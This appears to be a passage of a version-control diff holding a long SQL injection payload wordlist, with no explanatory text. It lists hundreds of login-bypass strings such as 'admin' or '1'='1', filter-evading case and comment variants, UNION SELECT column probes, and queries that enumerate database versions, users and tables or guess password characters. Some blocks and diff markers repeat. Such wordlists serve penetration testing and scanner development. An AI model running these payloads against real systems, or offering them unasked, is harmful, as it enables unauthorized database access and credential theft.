')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
